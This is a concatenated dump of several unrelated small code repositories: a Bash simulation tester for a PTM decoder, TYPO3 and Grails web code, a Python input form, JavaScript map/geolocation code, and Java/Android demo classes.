#ssh -p 2222 sglee@SNU "cd test_code; rm tb.sv"
#ssh -p 2222 sglee@SNU "cd test_code; rm decoder.v"
<file_sep>#!/bin/bash
args="-clean -access rwc -input run.tcl tb.sv decoder.v"
sim_len=1500
printf "\nPTM Decoder Tester\n\n"
while [ 1 ]
do
printf "Test Mode:\n[1] Function Only Check \n[2] Artificial Test Vector \n[3] Test Vector from File\n[4] Exit\n\n"
read -p "Test Mode Select: " _testmode
if [ $_testmode -eq 1 ] ; then
printf "[Function List]\n\n"
printf "A_SYNC = 0\n"
printf "I_SYNC = 1\n"
printf "TIME_STAMP = 2\n"
printf "ATOM = 3\n"
printf "BRANCH = 4\n"
printf "WAYPOINT = 5\n"
printf "TRIGGER = 6\n"
printf "CONTEXT_ID = 7\n"
printf "VMID = 8\n"
printf "EXCEPTION_RT = 9\n"
printf "IGNORE = 10\n\n"
read -p "Select : " func
irun "$args +define+TEST_FUNCTION=$func +define+SIMUL_MOD=0"
elif [ $_testmode -eq 2 ] ; then
printf "Simulation Length?"
read sim_len
if [ $sim_len -gt 10 ] ; then
irun "$args +define+SIMUL_MOD=1 +define+SIM_LENGTH=$sim_len"
else
printf " Value should be greater than 10\n"
fi
elif [ $_testmode -eq 3 ] ; then
awk -F"[][ ]" '{print $1}' a_out.txt | sed '/^$/d' > test_vect.txt
awk -F"[][ ]" '{print $1}' b_out.txt | sed '/^$/d' >> test_vect.txt
awk -F"[][ ]" '{print $1}' c_out.txt | sed '/^$/d' >> test_vect.txt
grep "DUMP:" a_out.txt | awk '{print $3}'|sed 's/^..//' > answer.txt
grep "DUMP:" b_out.txt | awk '{print $3}'|sed 's/^..//' >> answer.txt
grep "DUMP:" c_out.txt | awk '{print $3}'|sed 's/^..//' >> answer.txt
printf "\n\nFile \"test_vect.txt\" Generated! \n"
printf "File \"answer.txt\" Generated! \n\n"
irun "$args +define+SIMUL_MOD=2"
else
exit 0;
fi
done
|
79bb6bf0555f29e95e5cb6546a0c77487a0ae549
|
[
"Markdown",
"Shell"
] | 4
|
Shell
|
jakesanggulee/PTM-Packet-Decoder
|
3facd07ee54054e9ad4ebc481dea9fa44eb3d840
|
03fa306ee3d5cb4289790a0247debcd67a9ea25e
|
refs/heads/master
|
<file_sep>/*!
* Demo v1.0.0 (https://www.ringer.it)
* Copyright 2017-2020 <NAME>
* Licensed under the GPL-2.0-or-later license
*/
console.log("WE LOVE TYPO3");
<file_sep><?php
namespace Ringer\Demo\ViewHelpers;
use TYPO3\CMS\Backend\Utility\BackendUtility;
use TYPO3Fluid\Fluid\Core\Rendering\RenderingContextInterface;
use TYPO3Fluid\Fluid\Core\ViewHelper\AbstractViewHelper;
use TYPO3Fluid\Fluid\Core\ViewHelper\Traits\CompileWithRenderStatic;
class RecordTitleViewHelper extends AbstractViewHelper
{
use CompileWithRenderStatic;
/**
*/
public function initializeArguments()
{
$this->registerArgument('table', 'string', 'Table', true);
$this->registerArgument('id', 'int', 'ID', true);
}
/**
* @param array $arguments
* @param \Closure $renderChildrenClosure
* @param RenderingContextInterface $renderingContext
*/
public static function renderStatic(
array $arguments,
\Closure $renderChildrenClosure,
RenderingContextInterface $renderingContext
)
{
$record = BackendUtility::getRecord($arguments['table'], $arguments['id']);
if ($record) {
return BackendUtility::getRecordTitle($arguments['table'], $record);
}
return '';
}
}
|
d71d26035f159d94252c438f7ea8736b2e94e2e4
|
[
"JavaScript",
"PHP"
] | 2
|
JavaScript
|
kwm-code/demo2
|
89e47254da20e62b31eb109e3e5ace297cddd932
|
6fb52d463fa2c7dd0600f9fe492c1b4abc9dd77d
|
refs/heads/main
|
<repo_name>MHAsenjo/solicitud-datos-personales<file_sep>/programa1.py
#este es un programa, que pregunta tu nombre, apellido, edad, direccion, fecha de nacimiento
#email, telefono. Además, debe sumar la edad y año de nacimiento
nombre = input("buen dia, estoy completando ti ficha, por favor dime tu nombre: ")
apellido = input("cual es tu apellido: ")
edad = int(input("cual es tu edad: "))
direccion = input("tu direccion: ")
fechaNacimiento = input("fecha de nacimiento: ")
correoElectronico = input("cual es el correo electronico: ")
telefono = input("dame el telefono: ")
year = int(input("dime tu año de nacimiento: "))
#a continuación sumare year y edad
resultado = year + edad
print(f"los datos del formulario son: {nombre, apellido, direccion, fechaNacimiento, edad, correoElectronico, resultado}")
#sumar año + edad, restar el mes, multiplicar por el día y dividir por el añomatya
|
f852721ce147c849668c65f349a3a3ab906ca406
|
[
"Python"
] | 1
|
Python
|
MHAsenjo/solicitud-datos-personales
|
d8d82e1a86e5c87ec477afdcd0aa3b7244869e51
|
f0646f6b447a5688ec8112fdffd2f38b06bd14ae
|
refs/heads/master
|
<file_sep>/********************************************************************************
STARTING MAP
********************************************************************************/
function initialize() {
var mapOptions = {
center: { lat: -34.397, lng: 150.644},
zoom: 8
};
var map = new google.maps.Map(document.getElementById('map-canvas1'),mapOptions);
}
google.maps.event.addDomListener(window, 'load', initialize);
/********************************************************************************
INITIAL POSITION
********************************************************************************/
function initialPosition(e) { //Call geolocate()
geoLocate();
}
function geoLocate(){ //Find current latitude and longitude.
var msg = 'Sorry, we were unable to find your location. Please enter it below.';
var elLoc = document.getElementById("loc");
if (Modernizr.geolocation) { //Check Geo Support
navigator.geolocation.getCurrentPosition(success, fail);
elLoc.textContent = "Loading your location...";
} else {
elLoc.textContent = msg;
}
function success(position) {
lat1 = position.coords.latitude;
lon1 = position.coords.longitude; //If position found
msg = '<h3>Longitude:<br>';
msg += lon1 + '</h3>';
msg += '<h3>Latitude:<br>';
msg += lat1 + '</h3>';
elLoc.innerHTML = msg;
console.log(lat);
console.log(lon);
return [position.coords.longitude, position.coords.latitude];
}
function fail(msg) {
elLoc.textContent = msg;
console.log(msg.code);
}
}
var elInitial = document.getElementById("initial"); //Initial Position Button Listener
elInitial.addEventListener('click', initialPosition, false);
/********************************************************************************
INITIAL POSITION
********************************************************************************/<file_sep>function initialPosition(e) { //Call geolocate() from geolocate.js
e.preventDefault();
geoLocate();
}
function geoLocate(){
var msg = 'Sorry, we were unable to find your location. Please enter it below.';
var elLoc = document.getElementById("loc");
if (Modernizr.geolocation) { //Check Geo Support
navigator.geolocation.getCurrentPosition(success, fail);
elLoc.textContent = "Loading your location...";
} else {
elLoc.textContent = msg;
}
function success(position) {
lat = position.coords.latitude;
lon = position.coords.longitude; //If position found
msg = '<h3>Longitude:<br>';
msg += lon + '</h3>';
msg += '<h3>Latitude:<br>';
msg += lat + '</h3>';
elLoc.innerHTML = msg;
console.log(lat);
console.log(lon);
return [position.coords.longitude, position.coords.latitude];
}
function fail(msg) {
elLoc.textContent = msg;
console.log(msg.code);
}
}
function initialize () { //Initialize first map
var mapOptions = {
zoom : 8,
center : new google.maps.LatLng(lat,lon)
};
var map = new google.maps.Map(document.getElementById('map1'),mapOptions);
}
function loadScript() {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'https://maps.googleapis.com/maps/api/js?v=3.exp' + '&signed_in=true&callback=initialize';
document.body.appendChild(script);
}
function initialize2 () { //Initialize second map
lat2 = lat + 180; //180 degree offset
if (lat2 >= 180) {
lat2 = -180 + (lat2 - 180);
lat2 = lat2;
}
lon2 = lon + 180;
if (lon2 >= 180) {
lon2 = -180 + (lon2 - 180);
lon2 = lon2;
}
var mapOptions = {
zoom : 8,
center : new google.maps.LatLng(lat2,lon2)
};
console.log("Lat2: " +lat2+" Lon2: "+lon2);
var map = new google.maps.Map(document.getElementById('map2'),mapOptions);
}
var lat;
var lon;
var lat2;
var lon2;
var elInitial = document.getElementById("initial"); //Initial Position Button Listener
elInitial.addEventListener('click', initialPosition, false);
var elInitialMap = document.getElementById("getMap"); //Initial Position Button Listener
elInitialMap.addEventListener('click', loadScript, false);
var elInitialMap2 = document.getElementById("getMap2"); //Final Position Button Listener
elInitialMap2.addEventListener('click', initialize2, false);<file_sep># FarAway
App that shows the city furthest from you
<file_sep>function initialPosition(e) { //Call geolocate()
geoLocate();
}
function geoLocate(){ //Find current latitude and longitude.
var msg = 'Sorry, we were unable to find your location. Please enter it below.';
var elLoc = document.getElementById("loc");
if (Modernizr.geolocation) { //Check Geo Support
navigator.geolocation.getCurrentPosition(success, fail);
elLoc.textContent = "Loading your location...";
} else {
elLoc.textContent = msg;
}
function success(position) {
lat1 = position.coords.latitude;
lon1 = position.coords.longitude; //If position found
msg = '<h3>Longitude:<br>';
msg += lon1 + '</h3>';
msg += '<h3>Latitude:<br>';
msg += lat1 + '</h3>';
elLoc.innerHTML = msg;
console.log(lat);
console.log(lon);
return [position.coords.longitude, position.coords.latitude];
}
function fail(msg) {
elLoc.textContent = msg;
console.log(msg.code);
}
}
function getMap1 () {
var map = new google.maps.MAP(document.getElementById("map-canvas1"), {
zoom: 8,
center: {lat: lat1, lng: lon1}
});
}
var lat1, lon1, lat2, lon2;
var urlfirst = "https://www.google.com/maps/embed/v1/place?key=";
var ap = "<KEY>";
var elInitial = document.getElementById("initial"); //Initial Position Button Listener
elInitial.addEventListener('click', initialPosition, false);
var elInitialMap = document.getElementById("getMap1"); //Initial Position Button Listener
elInitialMap.addEventListener('click', getMap1, false);
var elInitialMap2 = document.getElementById("getMap2"); //Final Position Button Listener
elInitialMap2.addEventListener('click', initialize2, false);
|
97b4b70ba854661aaf38d61144711672750f5dc8
|
[
"JavaScript",
"Markdown"
] | 4
|
JavaScript
|
Jordan-Holt/FarAway
|
0d6fea7fb355e9314ed5a3b87dfd82f8e7a8e831
|
2ccc785ac8db6d2b4f1a7186d1c105a89439b318
|
refs/heads/master
|
<repo_name>firefinchdev/Simple-Notes<file_sep>/app/src/main/java/com/softinit/notes/AddEditNoteActivity.java
package com.softinit.notes;
import androidx.appcompat.app.ActionBar;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Bundle;
import android.view.Menu;
import android.view.MenuInflater;
import android.view.MenuItem;
import android.widget.EditText;
import android.widget.NumberPicker;
import android.widget.Toast;
public class AddEditNoteActivity extends AppCompatActivity {
public static final String EXTRA_ID = BuildConfig.APPLICATION_ID.concat("EXTRA_ID");
public static final String EXTRA_TITLE = BuildConfig.APPLICATION_ID.concat("EXTRA_TITLE");
public static final String EXTRA_DESC = BuildConfig.APPLICATION_ID.concat("EXTRA_DESC");
public static final String EXTRA_PRIORITY = BuildConfig.APPLICATION_ID.concat("EXTRA_PRIORITY");
private ActionBar actionBar;
private EditText etTitle;
private EditText etDesc;
private NumberPicker numberPickerPriority;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_add_note);
initialize();
Intent intent = getIntent();
if (intent.hasExtra(EXTRA_ID)) {
setTitle("Edit Note");
} else {
setTitle("Edit Note");
}
}
private void saveNote() {
String title = etTitle.getText().toString();
String desc = etDesc.getText().toString();
int priority = numberPickerPriority.getValue();
if (title.trim().isEmpty() || desc.trim().isEmpty()) {
Toast.makeText(this, "Please insert Title and Description", Toast.LENGTH_SHORT).show();
return;
}
Intent data = new Intent();
data.putExtra(EXTRA_TITLE, title);
data.putExtra(EXTRA_DESC, desc);
data.putExtra(EXTRA_PRIORITY, priority);
int id = getIntent().getIntExtra(EXTRA_ID, -1);
if (id != -1) {
data.putExtra(EXTRA_ID, id);
}
setResult(RESULT_OK, data); //Indicates that activity's work was success
finish();
}
private void initialize() {
acquireIds();
numberPickerPriority.setMinValue(1);
numberPickerPriority.setMaxValue(10);
actionBar.setHomeAsUpIndicator(R.drawable.ic_close);
Intent intent = getIntent();
if (intent.hasExtra(EXTRA_ID)) {
setTitle(R.string.edit_note_title);
etTitle.setText(intent.getStringExtra(EXTRA_TITLE));
etDesc.setText(intent.getStringExtra(EXTRA_DESC));
numberPickerPriority.setValue(intent.getIntExtra(EXTRA_PRIORITY, 1));
} else {
setTitle(R.string.add_note_title);
}
}
private void acquireIds() {
actionBar = getSupportActionBar();
etTitle = findViewById(R.id.et_title);
etDesc = findViewById(R.id.et_desc);
numberPickerPriority = findViewById(R.id.number_picker_priority);
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
MenuInflater menuInflater = getMenuInflater();
menuInflater.inflate(R.menu.add_note_menu, menu);
return true;
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
switch (item.getItemId()) {
case R.id.save_note: saveNote();
return true;
}
return super.onOptionsItemSelected(item);
}
}
<file_sep>/README.md
# Simple-Notes
A simple Notes Android app for trying ROOM database and MVVM pattern.
<file_sep>/app/src/main/java/com/softinit/notes/NoteRepository.java
package com.softinit.notes;
import android.app.Application;
import android.os.AsyncTask;
import java.util.List;
import androidx.lifecycle.LiveData;
public class NoteRepository {
private NoteDao noteDao;
private LiveData<List<Note>> allNotes;
public NoteRepository(Application application) {
NoteDatabase noteDatabase = NoteDatabase.getInstance(application);
noteDao = noteDatabase.noteDao();
allNotes = noteDao.getAllNotes();
}
public void insert(Note note) {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.INSERT).execute(note);
}
public void update(Note note) {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.UPDATE).execute(note);
}
public void delete(Note note) {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.DELETE).execute(note);
}
public void deleteAllNotes() {
new NoteOperationAsyncTask(noteDao, NoteOperationAsyncTask.DELETE_ALL).execute((Note)null);
}
public LiveData<List<Note>> getAllNotes() {
return allNotes;
}
private static class NoteOperationAsyncTask extends AsyncTask<Note, Void, Void> {
public static final int INSERT=2;
public static final int UPDATE=4;
public static final int DELETE=8;
public static final int DELETE_ALL=16;
private NoteDao noteDao;
private int type;
public NoteOperationAsyncTask(NoteDao noteDao, int type) {
this.noteDao = noteDao;
this.type = type;
}
@Override
protected Void doInBackground(Note... notes) {
switch (type) {
case INSERT:
noteDao.insert(notes[0]);
break;
case UPDATE:
noteDao.update(notes[0]);
break;
case DELETE:
noteDao.delete(notes[0]);
break;
case DELETE_ALL:
noteDao.deleteAllNotes();
break;
}
return null;
}
}
}
|
d6b49b844709db1a904297bfa738736cde8696bd
|
[
"Markdown",
"Java"
] | 3
|
Java
|
firefinchdev/Simple-Notes
|
6c9f1e873cf4348a220ae84723840564ea6165cf
|
137a97a040b7988ba2eddca8a54a76b4f364b17e
|
refs/heads/master
|
<repo_name>fossabot/comfygure<file_sep>/api/src/domain/environments/get.js
import environmentsQueries from '../../queries/environments';
export default async projectId => environmentsQueries.selectByProject(projectId);
<file_sep>/api/src/domain/environments/get.spec.js
import get from './get';
import environmentsQueries from '../../queries/environments';
jest.mock('../../queries/environments');
describe('domain/environments/get', () => {
it('should call the query with the right arguments', async () => {
const projectId = 1;
await get(projectId);
expect(environmentsQueries.selectByProject).toHaveBeenCalledWith(projectId);
});
});
<file_sep>/api/config/database.js
const config = require('config');
const databaseConfig = Object.assign({}, { driver: 'pg' }, config.db.client);
if (process.env.PGHOST) {
databaseConfig.host = process.env.PGHOST;
}
if (process.env.PGPORT) {
databaseConfig.port = process.env.PGPORT;
}
if (process.env.PGDATABASE) {
databaseConfig.database = process.env.PGDATABASE;
}
if (process.env.PGUSER) {
databaseConfig.user = process.env.PGUSER;
}
if (process.env.PGPASSWORD) {
databaseConfig.password = <PASSWORD>;
}
// dev is the configuration by default, using config to change the conf based on NODE_ENV value
module.exports = { dev: databaseConfig };
<file_sep>/api/src/domain/validation.js
import environmentsQueries from '../queries/environments';
import projectsQueries from '../queries/projects';
import { NotFoundError } from './errors';
export const checkEnvironmentExistsOrThrow404 = async (projectId, environmentName) => {
const project = await projectsQueries.findOne(projectId);
if (!project) {
throw new NotFoundError({
message: `Unable to found project "${projectId}"`,
details: [
'Have you initialized a comfy project is this directory?',
'Type "comfy init" to do so.',
].join(' '),
});
}
const env = await environmentsQueries.findOne(projectId, environmentName);
if (!env) {
throw new NotFoundError({
message: `Unable to found environment "${environmentName}" for project "${projectId}".`,
details: 'Type "comfy env ls" to list available environments.',
});
}
};
<file_sep>/docs/AdvancedUsage.md
---
layout: default
title: "Advanced Usage"
---
## Host Your Own Comfy Server
Marmelab hosts the default comfygure server at `https://comfy.marmelab.com`. You can use it for free, for your tests, with no warranties of availability. We reserve the right to suspend usage in case of abuse.
In production, you'll probably want to host your own comfygure server. Fortunately, the comfygure server code is open-source and [available on GitHub](https://github.com/marmelab/comfygure).
Comfygure is developed to be deployed through a few [AWS Lambdas](https://aws.amazon.com/fr/lambda/) thanks to [the serverless framework](https://serverless.com/). As for the database, you have to deal with it.
Once your server is configured, use the standard `comfy` client to initialize your project, and pass your server URL in the `--origin` option:
```bash
comfy init --origin https://my.custom.host
```
<file_sep>/api/makefile
SERVERLESS := node_modules/.bin/serverless
DATABASE ?= comfy
export PGUSER ?= postgres
export PGHOST ?= localhost
install:
npm i
install-db:
docker run --name comfy-db -p 5432:5432 -d postgres:9.6
sleep 5s
psql -c "CREATE DATABASE ${DATABASE}"
make migrate
migrate:
./node_modules/db-migrate/bin/db-migrate up --config ./config/database.js
start-db:
docker start comfy-db
stop-db:
docker stop comfy-db
connect-db:
psql comfy
run:
$(SERVERLESS) offline start --host=0.0.0.0 --port=3000
deploy:
NODE_ENV=production $(SERVERLESS) deploy --stage beta
undeploy:
NODE_ENV=production $(SERVERLESS) remove --stage beta
test:
NODE_ENV=test ./node_modules/.bin/jest
test-watch:
NODE_ENV=test ./node_modules/.bin/jest --watch
<file_sep>/api/src/domain/configurations/add.js
import hash from 'object-hash';
import entriesQueries from '../../queries/entries';
import versionsQueries from '../../queries/versions';
import configurationsQueries from '../../queries/configurations';
import environmentsQueries from '../../queries/environments';
import { ENVVARS } from '../common/formats';
import { get as getVersion } from './version';
import { add as addTag, get as getTag, update as updateTag } from './tag';
import { checkEnvironmentExistsOrThrow404 } from '../validation';
export default async (
projectId,
environmentName,
configurationName = 'default',
tagName = null,
entries = {},
) => {
await checkEnvironmentExistsOrThrow404(projectId, environmentName);
let configuration = await configurationsQueries.findOne(
projectId,
environmentName,
configurationName,
);
let configurationNewlyCreated = false;
if (!configuration) {
const environment = await environmentsQueries.findOne(projectId, environmentName);
// TODO: If no environment found, return a usable error
configuration = await configurationsQueries.insertOne({
environment_id: environment.id,
name: configurationName,
default_format: ENVVARS,
});
configurationNewlyCreated = true;
}
const currentVersion = await getVersion(projectId, environmentName, configurationName, tagName);
const versionHash = hash({
previous: currentVersion ? currentVersion.hash : null,
entries,
});
// TODO: If the version hash already exist in DB
// return a 304 to warn that the version already exists
const version = await versionsQueries.insertOne({
hash: versionHash,
configuration_id: configuration.id,
previous: currentVersion ? currentVersion.hash : null,
});
const newTagInfos = {
versionId: version.id,
configurationId: configuration.id,
};
if (configurationNewlyCreated) {
await Promise.all([
{ ...newTagInfos, name: 'stable' },
{ ...newTagInfos, name: 'next' },
].map(tag => addTag(tag.configurationId, tag.versionId, tag.name)));
}
// Create or update the specified tag
if (tagName) {
const tag = await getTag(configuration.id, tagName);
if (tag) {
await updateTag(tag, { version_id: version.id });
} else {
await addTag(newTagInfos.configurationId, newTagInfos.versionId, tagName);
}
}
await Promise.all(Object.keys(entries).map(key => entriesQueries.insertOne({
key,
value: entries[key],
version_id: version.id,
})));
const { id, name, default_format: defaultFormat } = configuration;
return {
id,
name,
defaultFormat,
};
};
<file_sep>/docs/index.md
---
layout: default
title: "Documentation"
---
# Comfygure
Store and deploy settings across development, test, and production environments, using an encrypted key-value store.
<div style="text-align: center" markdown="1">
<i class="octicon octicon-mark-github"></i> [Source](https://github.com/marmelab/comfygure) -
<i class="octicon octicon-megaphone"></i> [Releases](https://github.com/marmelab/comfygure/releases) -
<i class="octicon octicon-comment-discussion"></i> [StackOverflow](https://stackoverflow.com/questions/tagged/comfy/)
</div>
Comfygure assumes that you deploy artefacts that require settings to run in various environment. Comfygure solves the problem of managing, storing, and deploying these settings.
<script type="text/javascript" src="https://asciinema.org/a/137703.js" id="asciicast-137703" async></script>
Unlike many other [Secret Management Tools](https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd), comfygure doesn't try do pack too many features into one tool. Comfygure tries to do one thing (settings deployment), and do it well.
## Features
* Simple CLI tool
* Web GUI
* Multi-environment (dev, test, staging, production, etc.)
* End-to-end encryption using AES-256
* Read/Write permissions
* Input and output in multiple formats (JSON, YAML, environment variables)
* Versioning (git-like)
* Easy to host
## Command Line Installation
On every server that needs access to the settings of an app, install the `comfy` CLI using `npm`:
```bash
npm install -g comfygure
comfy help
```
## Usage
Initialize comfygure in a project directory with `comfy init`:
```bash
> cd myproject
> comfy init
Initializing project configuration...
Project created on comfy server https://comfy.marmelab.com
Configuration saved locally in .comfy/config
comfy project successfully created
```
This creates a unique key to access the settings for `myproject`, and stores the key in `.comfy/config`. You can copy this file to share the credentials with co-workers or other computers.
**Tip**: By default, the `comfy` command stores encrypted settings in the `comfy.marmelab.com` server. To host your own comfy server, see [the related documentation](./AdvancedUsage.html#host-your-own-comfy-server).
Import an existing settings file to comfygure using `comfy setall`:
```bash
> echo '{"login": "admin", "password": "<PASSWORD>"}' > config.json
> comfy setall development config.json
Great! Your configuration was successfully saved.
```
From any computer sharing the same credentials, grab these settings using `comfy get`:
```bash
> comfy get development
{"login": "admin", "password": "<PASSWORD>"}
> comfy get development --envvars
export LOGIN='admin';
export PASSWORD='<PASSWORD>';
```
To turn settings grabbed from comfygure into environment variables, use the following:
```bash
> comfy get development --envvars | source /dev/stdin
> echo $LOGIN
admin
```
See the [documentation](https://marmelab.com/comfygure/) to know more about how it works and the remote usage.
## License
Comfygure is licensed under the [MIT License](https://github.com/marmelab/comfygure/blob/master/LICENSE), sponsored and supported by [marmelab](http://marmelab.com).
|
02d7da4a16b86df3a71b427cf65d784a67ae327b
|
[
"JavaScript",
"Makefile",
"Markdown"
] | 8
|
JavaScript
|
fossabot/comfygure
|
97c81893d4d36a9dce6469e94701322147568326
|
14cabe25c5858568b5c276c44a7aa8c89e961e57
|
refs/heads/master
|
<repo_name>EmilGabriel81/MVPDemo<file_sep>/app/src/main/java/com/unn/mvpdemo/Presenter.java
package com.unn.mvpdemo;
import com.unn.mvpdemo.Contract.IView;
public class Presenter implements Contract.IPresenter {
IView view;
public Presenter(IView view) {
this.view = view;
}
@Override
public void doLogin(String email, String password) {
if(email.equalsIgnoreCase("Emil")&&password.equalsIgnoreCase("123")){
view.onSuccess("Welcome");
}else{
view.onError("Unsuccessful attempt!");
}
}
}
<file_sep>/app/src/main/java/com/unn/mvpdemo/MainActivity.java
package com.unn.mvpdemo;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;
public class MainActivity extends AppCompatActivity implements Contract.IView{
private static final String TAG = "MainActivity";
EditText email_txt, password_txt;
Button login_btn;
Contract.IPresenter presenter;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
email_txt = findViewById(R.id.email);
password_txt = findViewById(R.id.password);
login_btn = findViewById(R.id.btn_login);
presenter = new Presenter(this);
login_btn.setOnClickListener((View v) -> {
String email = email_txt.getText().toString();
String password = password_txt.getText().toString();
performLogin(email, password);
});
}
private void performLogin(String email, String password) {
presenter.doLogin(email,password);
}
@Override
public void onSuccess(String message) {
//Toast toast = Toast.makeText(getApplicationContext(), message, Toast.LENGTH_LONG).show();
Log.v(TAG,message);
Intent intent = new Intent(this,WelcomeActivity.class);
String name = email_txt.getText().toString();
intent.putExtra("Extra_message", name);
startActivity(intent);
}
@Override
public void onError(String message) {
Log.v(TAG,message);
Intent intent = new Intent(this,DeniedActivity.class);
startActivity(intent);
}
}
|
8d04331bc7ac134aef74f4d80ea98539b098e91f
|
[
"Java"
] | 2
|
Java
|
EmilGabriel81/MVPDemo
|
107cfde872b00974a10bb8e6b401679824c85e54
|
6449363d03b42eb423022758c530973854bd34f1
|
refs/heads/master
|
<repo_name>leandrobaena/tournament_java<file_sep>/database.properties
url=jdbc:mysql://localhost:3306/tournament
user=root
password=<PASSWORD>
<file_sep>/README.md
# tournament_java
Manejo de campeonatos de fútbol en java y mysql
<file_sep>/src/entities/Championship.java
package entities;
/**
* Campeonato o competición
*
* @author <NAME>
*/
public class Championship {
//<editor-fold defaultstate="collapsed" desc="Constructores">
/**
* Crea un nuevo campeonato con identificador 0 y nombre vacio
*/
public Championship() {
this.idchampionship = 0;
this.name = "";
}
/**
* Crea un nuevo campeonato con identificador determinado y nombre vacio
*
* @param idcampionship Identificador del campeonato
*/
public Championship(int idcampionship) {
this.idchampionship = idcampionship;
this.name = "";
}
//</editor-fold>
//<editor-fold defaultstate="collapsed" desc="Propiedades">
/**
* Trae el identificador del campeonato
*
* @return Identificador del campeonato
*/
public int getIdchampionship() {
return idchampionship;
}
/**
* Cambia el identificador del campeonato
*
* @param idchampionship Nuevo identificador del campeonato
*/
public void setIdchampionship(int idchampionship) {
this.idchampionship = idchampionship;
}
/**
* Trae el nombre del campeonato
*
* @return Nombre del campeonato
*/
public String getName() {
return name;
}
/**
* Cambia el nombre del campeonato
*
* @param name Nuevo nombre del campeonato
*/
public void setName(String name) {
this.name = name;
}
//</editor-fold>
//<editor-fold defaultstate="collapsed" desc="Atributos">
/**
* Identificador del campeonato
*/
private int idchampionship;
/**
* Nombre del campeonato
*/
private String name;
//</editor-fold>
}
|
cbe8696ecac1529834dc424ea85b2ae60452400a
|
[
"Markdown",
"Java",
"INI"
] | 3
|
INI
|
leandrobaena/tournament_java
|
6d6892008a325961e66a304204e83b6c56f50f3e
|
832d634615d8c2e8cb1813a97fc8eaad50b5d1a7
|
refs/heads/master
|
<repo_name>mainul35/sm-trading-erp<file_sep>/grails-app/assets/javascripts/fusion/fusion.requestManager.js
Fusion.requestManager = {
beforeSubmit: function (e = null) {
return e
},
onSubmit: function (e = null) {
return e
},
afterSubmit: function (e = null) {
return e
}
}<file_sep>/grails-app/assets/javascripts/fusion/fusion.core.js
var Fusion = {}
Fusion.authentication = {
clientDetails: btoa(
JSON.stringify([
{appName: 'bismillah-app'},
{clientId: 'MzMzZGViZWMtZTBhOS00NzhkLTg2MTEtZTcyY2U5ZmMxODQ0'},
{clientSecret: '<KEY>'},
{requestType: 'xhr'}
])
)
}<file_sep>/grails-app/i18n/constant.messages.properties
default=bismillah-app
login=Login
password=<PASSWORD>
email=Email
forgot.password=<PASSWORD>?<file_sep>/grails-app/assets/javascripts/dashboard.js
Fusion.requestManager.onSubmit(function () {
$(".btnSubmit").unbind().on('click', function (e) {
var form = $(this).closest("form")
var url = form.attr("to-url")
var data = JSON.stringify(form.serializeArray())
data = btoa(data)
$.ajax({
type: 'POST',
url: url + "?key=" + data,
data: {},
dataType: "json",
headers: {
"client-details": Fusion.authentication.clientDetails
},
success: function (result) {
document.cookie = 'token='
document.cookie = `token=${result.responseData.token}`
if (result.responseData.statusCode == 200) {
location.href = '/management/dashboard'
}
}
});
})
}())<file_sep>/grails-app/assets/javascripts/application.js
//= require libs/jquery.min
//= require libs/bootstrap/js/popper.min
//= require libs/jquery.dataTables.min
//= require libs/bootstrap/js/bootstrap.min
//= require libs/moment-with-locales
//= require libs/jquery_ui/jquery-ui
//= require fusion/fusion.core
//= require fusion/fusion.requestManager
//= require auth
//= require dashboard
//= require_self
<file_sep>/settings.gradle
//include("plugins/security")<file_sep>/grails-app/assets/admin/js/sm-trading-erp/app.js
var APP = {}
APP.tabs = []
APP.addTab = function (tab) {
var li = document.createElement("li")
var a = document.createElement("a")
var t = document.createTextNode(tab.name)
var tab = {}
li.classList.add("nav-item")
li.appendChild(a)
a.appendChild(t)
a.href = tab.url ? tab.url : ""
a.classList.add("nav-link")
document.querySelector(".erp-nav").appendChild(li)
tab.li = li
tab.dropdownItems = []
this.tabs.push(tab)
}
APP.addDropdownItem = function (tabName, dropdownItem) {
var tab = APP.createDropdown(tabName)
var t = document.createTextNode(dropdownItem.name)
var childAnchor = document.createElement("a")
childAnchor.classList.add("dropdown-item")
childAnchor.appendChild(t)
childAnchor.href = dropdownItem.url ? dropdownItem.url : ""
tab.dropdownItems.push(childAnchor)
APP.replaceTab(tab)
}
APP.replaceTab = function (tab) {
APP.tabs.forEach(function (t, i) {
var parentAnchor = t.li.querySelector("a")
if (parentAnchor.textContent === tab.li.querySelector("a").textContent) {
APP.tabs[i] = tab
}
})
}
APP.removeTab = function (tabName) {
return this.tabs.filter(
function (value) {
return value.textContent !== tabName;
})
}
APP.removeDropdownItem = function (dropdownItem) {
return this.tabs.filter(
function (value) {
return value !== dropdownItem;
})
}
APP.createDropdown = function (tabName) {
for (var count = 0; count < APP.tabs.length; count++) {
var tab = APP.tabs[count]
var parentAnchor = tab.li.querySelector("a")
if (parentAnchor.textContent === tabName) {
if (!parentAnchor.classList.contains("dropdown-toggle")) {
var div = document.createElement("div")
parentAnchor.classList.add("dropdown-toggle")
parentAnchor.dataset.toggle = "dropdown"
parentAnchor.id = "navbarDropdownMenuLink"
parentAnchor.setAttribute("aria-haspopup", "true");
parentAnchor.setAttribute("aria-expanded", "true");
tab.li.classList.add("dropdown")
div.classList.add("dropdown-menu")
div.classList.add("app-dropdown")
div.setAttribute("aria-labelledby", "navbarDropdownMenuLink");
div.setAttribute("x-placement", "bottom-start");
tab.li.appendChild(div)
}
return tab
}
}
}
APP.initializeTabs = function () {
APP.tabs.forEach(function (tab) {
document.querySelector(".erp-nav").appendChild(tab.li)
})
}
APP.initializeDropdownItems = function (tabName, dropdownItems) {
dropdownItems.forEach(function (dropdownItem) {
APP.addDropdownItem(tabName, dropdownItem)
})
APP.tabs.filter(function (tab) {
var parentAnchor = tab.li.querySelector("a")
if (parentAnchor.textContent === tabName) {
tab.dropdownItems.forEach(function (ddi) {
tab.li.querySelector(".dropdown-menu").appendChild(ddi)
})
}
})
